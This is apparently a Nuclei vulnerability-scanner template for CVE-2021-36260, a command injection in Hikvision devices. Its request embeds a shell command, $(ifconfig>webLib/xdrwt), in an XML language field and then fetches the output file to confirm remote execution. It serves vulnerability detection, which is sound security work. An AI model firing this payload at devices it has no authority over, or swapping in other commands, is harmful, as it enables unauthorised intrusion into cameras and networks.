id: hikvision-rce-cve-2021-36260

info:
  name: 海康威视命令注入 cve-2021-36260
  author: SleepingBag945
  severity: critical
  description: |
    海康威视命令注入 cve-2021-36260
  metadata:
  tags: hikvision

http:
  - raw:
      - |
        PUT /SDK/webLanguage HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Content-Length: 105
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip

        <?xml version="1.0" encoding="UTF-8"?><language>$(ifconfig>webLib/xdrwt)</language>

      - |
        GET /xdrwt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Content-Type: application/json;charset=utf-8
        Accept-Encoding: gzip



    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 500 && contains(body_1,"/SDK/webLanguage")'
          - status_code_2 == 200 && contains(body_2,"inet addr") && contains(body_2,"Mask")
        condition: and
